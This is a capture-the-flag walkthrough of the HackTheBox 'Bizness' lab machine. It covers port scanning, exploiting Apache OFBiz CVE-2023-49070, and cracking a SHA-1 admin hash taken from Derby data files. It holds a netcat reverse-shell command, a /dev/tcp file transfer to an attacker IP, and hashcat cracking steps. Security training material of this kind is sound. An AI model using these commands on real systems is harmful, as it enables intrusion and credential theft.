Bizness

Task 0 - Deploy machine
🎯 Target IP: 10.129.237.34
Create a directory on the Desktop with the machine's name, and inside this directory, create another directory to store the materials and outputs needed to run the machine, including the scans made with nmap.
After this, start the VPN so the lab is reachable: openvpn htb_vpn.ovpn
Task 1 - Reconnaissance
su
echo "10.129.237.34 bizness.htb" >> /etc/hosts
mkdir -p htb/bizness.htb
cd htb/bizness.htb
mkdir {nmap,content,exploits,scripts}
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target: this checks connectivity and gives a first hint about the OS.
ping -c 3 bizness.htb
PING bizness.htb (10.129.237.34) 56(84) bytes of data.
64 bytes from bizness.htb (10.129.237.34): icmp_seq=1 ttl=63 time=50.8 ms
64 bytes from bizness.htb (10.129.237.34): icmp_seq=2 ttl=63 time=56.0 ms
64 bytes from bizness.htb (10.129.237.34): icmp_seq=3 ttl=63 time=53.3 ms
From these three ICMP replies we see that the Time To Live (TTL) is ~64 secs; this indicates that the target is probably a *nix system, while Windows systems usually have a TTL of 128 secs.
1.1 - How many TCP ports are listening on Bizness?
Let's start right away with an active port scan using nmap:
sudo nmap -p0- -sS -Pn -T4 -vvv bizness.htb -oN nmap/tcp_port_scan
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
443/tcp open https syn-ack ttl 63
45853/tcp open unknown syn-ack ttl 63
-sT: TCP connect port scan (default without root privileges)
-sC: run default scripts
-sV: enumerate versions
-vvv: verbosity
-T4: run a bit faster
-oN: output to a file in nmap's normal format
It looks like there are 4 open TCP ports on the machine: 22,80,443,45853.
Then, we can proceed to analyze services active on open ports:
sudo nmap -sV -sC -p 22,80,443,45853 bizness.htb -oN nmap/service_port_scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
443/tcp open ssl/http nginx 1.18.0
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| tls-alpn:
|_ http/1.1
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg:
|_ http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after: 2328-11-10T20:03:40
|_ssl-date: TLS randomness does not represent time
45853/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
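To turn scan files like the two above into something a script can check (how many ports are open, which open ports nmap could not identify and therefore need manual follow-up), here is a small parser for nmap's normal (-oN) port table. This is an added example, not part of the original writeup; the two sample scans embedded below are constructed from the output shown above, and the "needs follow-up" rule for unknown/tcpwrapped services is this example's own choice.

```python
import re
from dataclasses import dataclass

# Constructed sample in nmap "normal" (-oN) format, copied from the SYN scan above.
SYN_SCAN = """\
# Nmap scan initiated (constructed sample)
PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 63
80/tcp    open  http    syn-ack ttl 63
443/tcp   open  https   syn-ack ttl 63
45853/tcp open  unknown syn-ack ttl 63
"""

# Constructed sample from the -sV/-sC scan above; script lines start with | or |_.
SERVICE_SCAN = """\
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp    open  http     nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
443/tcp   open  ssl/http nginx 1.18.0
45853/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# port/proto, state, service, then whatever the last column holds (REASON or VERSION).
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    detail: str  # REASON column for -sS output, VERSION column for -sV output


def parse_nmap_normal(text):
    """Parse the port table of an nmap -oN file; header, comment and NSE script lines are skipped."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, detail = m.groups()
            records.append(PortRecord(int(port), proto, state, service, detail or ""))
    return records


def open_ports(records):
    """Sorted list of open port numbers (answers question 1.1 from the scan file)."""
    return sorted(r.port for r in records if r.state == "open")


def unidentified(records):
    """Open ports whose service nmap could not name; these need a manual look."""
    return sorted(
        r.port for r in records
        if r.state == "open" and r.service in ("unknown", "tcpwrapped")
    )


if __name__ == "__main__":
    syn = parse_nmap_normal(SYN_SCAN)
    print("open ports:", open_ports(syn))
    print("needs follow-up:", unidentified(parse_nmap_normal(SERVICE_SCAN)))
```

The regex deliberately matches only the port table, so NSE script output and the "Service Info" trailer never produce records; the -sS and -sV files can therefore be fed to the same function and compared.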
1.2 - What Enterprise Resource Planning (ERP) backend is in use?
The web server runs nginx 1.18; we can confirm this and gather other information with the whatweb command: whatweb bizness.htb
http://bizness.htb [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[nginx/1.18.0], IP[10.129.237.34], RedirectLocation[https://bizness.htb/], Title[301 Moved Permanently], nginx[1.18.0]
https://bizness.htb/ [200 OK] Bootstrap, Cookies[JSESSIONID], Country[RESERVED][ZZ], Email[info@bizness.htb], HTML5, HTTPServer[nginx/1.18.0], HttpOnly[JSESSIONID], IP[10.129.237.34], JQuery, Lightbox, Script, Title[BizNess Incorporated], nginx[1.18.0]
Then, open the web server in a browser:

Directory enumeration with the Dirb tool and a look at the page source don't reveal anything else useful.
dirb https://bizness.htb

We discover an interesting page that contains a login form and the ERP version:
https://bizness.htb/accounting/control/main

1.3 - What version of OFBiz is running on the target system?
The OFBiz version is already visible in the previous screenshot:
Task 2 - Exploitation & User Flag
2.1 - What is the 2023 CVE ID for a pre-authentication, remote code execution vulnerability on this version of OFBiz?
Using the searchsploit tool we quickly find an exploit for this version of Apache OFBiz

Search for it on Google to check potential alternatives and find the related CVE ID

This CVE is from 2024, so we need to find a 2023 CVE instead; Google: "ofbiz 18.12 CVE 2023"

and we find a 2023 CVE on the NIST site:
https://nvd.nist.gov/vuln/detail/cve-2023-49070
Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10. Users are recommended to upgrade to version 18.12.10
2.2 - What user is the OFBiz service running as?
There's a PoC for it on GitHub: https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass which contains everything we need: the PoC and the ysoserial-all.jar tool
Always be careful what you download; open source / GitHub does not mean a program is 100% harmless
Download the files locally with git clone:
git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git

Check our attacker box IP with ifconfig tun0,
start a listener with netcat: nc -lvnp 1339,
and in another shell run the exploit, spawning a /bin/bash shell:
python3 exploit.py --url https://bizness.htb --cmd 'nc -e /bin/bash 10.10.17.177 1339'

2.3 - Submit the flag located in the ofbiz user's home directory.
Go to the user's home directory with cd ~ and cat the user flag

Task 3 - Privilege Escalation & Root Flag
3.1 - What is the full path of the directory that OFBiz is installed in?
We can find it in the /opt directory

3.2 - What hashing algorithm is the OFBiz installation configured to use for passwords?
To make our shell interactive and more usable, run: python3 -c 'import pty;pty.spawn("/bin/bash")'
then start searching the configuration files for the hashing algorithm in use.

There's an interesting file under /opt/ofbiz/framework/security/config that contains the answer:

3.3 - What database is used by Apache OFBiz, by default?
Search for a database-related directory among the data folders.
We find an interesting file at /opt/ofbiz/runtime/data/derby/derby.log
that contains the db logs with the corresponding db name and version

3.4 - In which directory are the Derby-related files stored on Bizness?
Navigating the folders, there's an interesting directory at /opt/ofbiz/runtime/data/derby/ofbiz/seg0 containing many .dat files


Search them for an 'admin' string with: grep -a -l 'admin.$' *.dat
to list only the interesting files, which should contain sensitive administrative strings

and in the file c6650.dat we find this value: admin$"$SHA$$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
3.5 - Using derby-tools and the ij command-line utility, what is the command within ij to connect to a database stored in ./ofbiz?
Maybe I've already gone too far with the previous question.

The ij utility doesn't seem to be present on this machine, so we can transfer the .dat files and install ij on our Kali attacker machine.
Archive the files with:
tar cvf /dev/shm/derby.tar derby
Transfer the derby files to the attacker machine:
Start a listener on the attacker machine:
nc -lvnp 4433 > derby.tar
Send the file via netcat (using bash's /dev/tcp):
cat /dev/shm/derby.tar > /dev/tcp/10.10.17.177/4433

Now we have the db on the attacker machine; unpack the archive with: tar -xvf derby.tar
and install ij to connect to the db:
sudo apt install derby-tools
ij
protocol 'jdbc:derby';
connect 'jdbc:derby:./ofbiz;create=true';
show tables;

In my case I had to add the extra attribute create=true to get the connection to open correctly.
3.6 - Which table contains the SHA-1 hash of the admin user?
Querying the db we can discover the table that contains the SHA-1 hash of the admin user:
select * from OFBIZ.USER_LOGIN;
describe OFBIZ.USER_LOGIN;
select USER_LOGIN_ID,CURRENT_PASSWORD FROM OFBIZ.USER_LOGIN;
That's of course the same hash we already know: $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
3.7 - What is the hex version of the discovered hash?
We know that the password hash $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I is in a SHA1-based format:
$SHA$: indicates the use of the SHA-1 hashing algorithm.
d: the salt used in the hashing process.
uP0_QaVBpDWFeo8-dRzDqRwXQ2I: the Base64 URL-encoded hash. After decoding, this is the actual hash value.
Decoding the Base64 URL-encoded string (the stored value uses the URL-safe alphabet and omits padding, so the '_' and '-' are translated and an '=' is appended before decoding):
echo -n "uP0_QaVBpDWFeo8-dRzDqRwXQ2I=" | tr '_-' '/+' | base64 -d | xxd -p > hash.txt
tr '_-' '/+': converts the URL-safe Base64 alphabet to the standard one.
base64 -d: decodes the Base64 string.
xxd -p: converts the decoded bytes into plain hexadecimal format. We need the hexadecimal version of the hash to use it in hashcat.
This generates a file hash.txt containing the decoded hash in hexadecimal format.
At this point we have the decoded hash and we know the salt (d). However, hashcat expects the input hash in the format <hash>:<salt>:
echo 'b8fd3f41a541a435857a8f3e751cc3a91c174362:d' > hash.txt
3.7 - What is the root user's password?
Now we can proceed to crack the hash with hashcat, using -m 120, which corresponds to the hashing algorithm sha1($salt.$pass):
hashcat -m 120 hash.txt /usr/share/wordlists/rockyou.txt
obtaining our password in cleartext: b8fd3f41a541a435857a8f3e751cc3a91c174362:d:monkeybizness
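The two steps above (decoding the $SHA$salt$hash value into hashcat's hex:salt form, and the sha1($salt.$pass) computation that -m 120 performs) can be reproduced in a few lines, which is useful when auditing an OFBiz install for weak admin passwords without shipping its hashes to a cracking rig. This is an added example, not code from the writeup or from OFBiz; it assumes the stored format is exactly as described above (Java's "SHA" label meaning SHA-1, salt prepended to the password, URL-safe Base64 without padding), and make_ofbiz_hash is this example's own helper used only for a round-trip check.

```python
import base64
import hashlib
import hmac

# The hash recovered from the Derby data files in the walkthrough above.
OFBIZ_HASH = "$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"

# OFBiz algorithm label -> hashlib name. Java's "SHA" is SHA-1; only that
# label is mapped here, since it is the one this page documents.
ALGORITHMS = {"SHA": "sha1"}


def parse_ofbiz_hash(value):
    """Split '$ALGO$salt$base64url' into (algo, salt, raw digest bytes).

    The digest is URL-safe Base64 with the '=' padding stripped, which is why a
    plain 'base64 -d' rejects the '_' and '-' characters; padding is restored here.
    """
    parts = value.split("$")
    if len(parts) != 4 or parts[0] != "":
        raise ValueError("not an OFBiz $ALGO$salt$hash string")
    _, algo, salt, encoded = parts
    padded = encoded + "=" * (-len(encoded) % 4)
    return algo, salt, base64.urlsafe_b64decode(padded)


def to_hashcat_line(value):
    """Produce the '<hex digest>:<salt>' line hashcat mode 120 expects."""
    _, salt, digest = parse_ofbiz_hash(value)
    return f"{digest.hex()}:{salt}"


def ofbiz_digest(algo, salt, password):
    """Recompute the digest the way hashcat mode 120 does: hash(salt + password)."""
    h = hashlib.new(ALGORITHMS[algo])
    h.update(salt.encode())
    h.update(password.encode())
    return h.digest()


def verify(value, candidate):
    """True if candidate is the password behind an OFBiz hash string."""
    algo, salt, digest = parse_ofbiz_hash(value)
    return hmac.compare_digest(ofbiz_digest(algo, salt, candidate), digest)


def make_ofbiz_hash(password, salt, algo="SHA"):
    """Encode a password in the same stored format (example helper for round-trip checks)."""
    encoded = base64.urlsafe_b64encode(ofbiz_digest(algo, salt, password)).decode().rstrip("=")
    return f"${algo}${salt}${encoded}"


if __name__ == "__main__":
    print(to_hashcat_line(OFBIZ_HASH))
    # Checks the page's cracked password against the stored value without hashcat.
    print(verify(OFBIZ_HASH, "monkeybizness"))
```

The reason the crack above finishes in seconds is visible in ofbiz_digest: a single unsalted-in-practice SHA-1 pass (the salt is one character) costs nothing per guess, so a wordlist run through this function is as effective as hashcat on a small scale. Rotating the admin password and moving to a slow, per-user-salted password hash is the corresponding fix on the OFBiz side.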

3.8 - Submit the flag located in the root user's home directory.
Finally, we know the admin password and can switch to root with: su -

